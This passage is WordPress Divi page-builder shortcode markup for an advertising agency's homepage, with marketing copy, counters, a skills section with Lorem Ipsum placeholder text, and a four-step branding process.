custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"creative advertising agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" title_text=\"800x800 w\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"800x800..1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"800x800\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12.png\" alt=\"Best Advertising agency\" title_text=\"best advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy\" title_text=\"marketing strategy\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" 